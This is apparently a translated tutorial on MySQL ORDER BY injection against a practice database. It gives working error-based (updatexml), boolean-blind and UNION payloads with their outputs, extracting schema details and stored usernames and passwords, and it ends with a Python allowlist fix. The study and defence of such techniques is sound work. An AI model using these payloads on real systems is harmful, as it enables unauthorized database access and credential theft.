Today I am summarizing injection points that sit in the ORDER BY sort clause (ORDER BY injection), writing the process down as a learning record.
Disclaimer: this article is for study and research purposes only; do not use it for illegal purposes, or you bear the consequences yourself!
Introduction to the injection method
When the page shows MySQL error messages and the injection point comes after ORDER BY, the error messages can be used for error-based injection.
- Normal statements
mysql> select * from users order by id;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql> select * from users order by id desc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 14 | admin4 | admin4 |
| 12 | dhakkan | dumbo |
| 11 | admin3 | admin3 |
| 10 | admin2 | admin2 |
| 9 | admin1 | admin1 |
| 8 | admin | admin |
| 7 | batman | mob!le |
| 6 | superman | genious |
| 5 | stupid | stupidity |
| 4 | secure | crappy |
| 3 | Dummy | p@ssword |
| 2 | Angelina | I-kill-you |
| 1 | Dumb | Dumb |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql>
Here, in "select * from users order by id desc;", the "desc" is the parameter value controlled by the user.
ORDER BY and error-based injection
- Now for error-based injection
- First, gather some basic information
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security' //current database
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select version())),0));
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53' //database version
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //user
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@datadir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:\soft\phpmystudy\MySQL\data\' //database data path
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@version_compile_os)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Win32' //operating system
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@basedir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:/soft/phpmystudy/MySQL/' //mysql installation path
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select session_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //user name of the database connection
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select current_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //current user name
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select system_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //system user name
mysql>
- Getting data information
Getting the number of databases
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(schema_name) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql>
Note: count(*) counts the result rows, while count(schema_name) counts only the rows where that column is not null.
Getting the list of databases
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~challenges'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~dvwa'
mysql>
Note: here I use limit to fetch one row at a time. Why? Because I found that the output of a batch query with group_concat() has a length limit, so the rows have to be fetched one by one; of course, when there is a lot of data you would just write a small Python script to run through them.
- Getting table information for a given database
Getting the number of tables
payload:
and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "<database name>")),0))
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql>
Getting table names
payload:
and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "<database name>")),0))
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~referers'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~uagents'
mysql>
- Getting column information for a table in a given database
Number of columns
payload:
and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "<database name>" and table_name = "<table name>")),0))
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql>
Getting column names; when there are many columns, fetch them one at a time
payload:
and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "<database name>" and table_name = "<table name>")),0))
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~id'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~username'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~password'
mysql>
- 最后獲取想要的信息就簡(jiǎn)單了
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username,password from users limit 0,1)),0));
ERROR 1241 (21000): Operand should contain 1 column(s)
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql>
In my testing, it seems that only one column can be retrieved at a time.
ORDER BY and blind injection
When the page does not display MySQL error messages, and the only signal is the state of what the page renders, boolean-based blind injection can be used.
- Let's look at two simple statements
mysql> select * from users order by id ^(select(select version()) regexp '^aaaa');
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql> select * from users order by id ^(select(select version()) regexp '^5');
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 3 | Dummy | p@ssword |
| 2 | Angelina | I-kill-you |
| 5 | stupid | stupidity |
| 4 | secure | crappy |
| 7 | batman | mob!le |
| 6 | superman | genious |
| 9 | admin1 | admin1 |
| 8 | admin | admin |
| 11 | admin3 | admin3 |
| 10 | admin2 | admin2 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql>
A brief explanation: when the regexp match succeeds, it returns 1 (00000001). That 1 is then XORed with the binary value of each row's id, and the rows are sorted in ascending order by the XOR result, so the displayed ordering changes. Conversely, when the regexp does not match, it returns 0 (00000000); XORing a number with 0 leaves it unchanged, so the displayed ordering does not change.
Summary: when the page's ordering is scrambled, the regex matched the correct data; when the ordering is unchanged, the regex did not match.
From the above we can conclude that the database major version is 5. The '^5' here can also be written as the hexadecimal encoding of ^5.
ORDER BY and UNION queries
When the query is
$query = "select * from users order by id $input ";
with no parentheses around it, a union query cannot be used directly. When the query is
$query = "(select * from users order by id $input) ";
wrapped in parentheses, a union query becomes possible. Getting the version number:
mysql> (select * from users order by id ) union(select 1,(version()),3);
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 1 | 5.5.53 | 3 |
+----+----------+------------+
14 rows in set (0.00 sec)
mysql>
- I won't screenshot the rest one by one; the query format is as follows:
(select * from users order by id ) union(select 1,(payload),3);
Database information payloads:
database() //current database
version() //database version
user() //user
@@datadir //database data path
@@version_compile_os //operating system
@@basedir //mysql installation path
session_user() //user name of the database connection
current_user() //current user name
system_user() //system user name
Table information payloads:
Same as above, not repeated!
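Every technique above relies on the concatenation shown in the UNION section, $query = "select * from users order by id $input", so the fix is to keep the request value out of the SQL text entirely. The following Python example is added here and is not code from the original post: because ORDER BY column names and directions cannot be bound as prepared-statement parameters, it maps the request value through an allowlist of fixed strings, runs the result against an in-memory SQLite copy of the users table (constructed sample rows), and shows the page's updatexml payload being rejected before any query is built. The function names and allowlist contents are assumptions.

```python
import sqlite3

# Constructed sample rows mirroring the users table shown on this page.
SAMPLE_ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"),
               (3, "Dummy", "p@ssword"), (14, "admin4", "admin4")]

# The only sort columns and directions the application will ever emit.
# Both sets are assumptions for this example.
ALLOWED_COLUMNS = {"id", "username"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(column: str, direction: str) -> str:
    """Return a safe 'ORDER BY <col> <dir>' fragment or raise ValueError.

    Identifiers and keywords cannot be bound as query parameters, so the
    request values are used only as lookup keys; the emitted SQL contains
    nothing but strings the application itself defined."""
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    key = direction.strip().lower()
    if key not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    return f"ORDER BY {column} {ALLOWED_DIRECTIONS[key]}"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def fetch_user_ids(conn: sqlite3.Connection, column: str, direction: str) -> list:
    sql = "SELECT id FROM users " + build_order_by(column, direction)
    return [row[0] for row in conn.execute(sql)]


def demo() -> dict:
    conn = make_db()
    results = {"desc": fetch_user_ids(conn, "id", "desc")}
    # The page's error-based payload arriving in the direction parameter:
    # it never reaches the SQL string because the allowlist lookup fails.
    payload = "and(updatexml(1,concat(0x7e,(select database())),0))"
    try:
        fetch_user_ids(conn, "id", payload)
        results["payload"] = "executed"
    except ValueError:
        results["payload"] = "rejected"
    return results
```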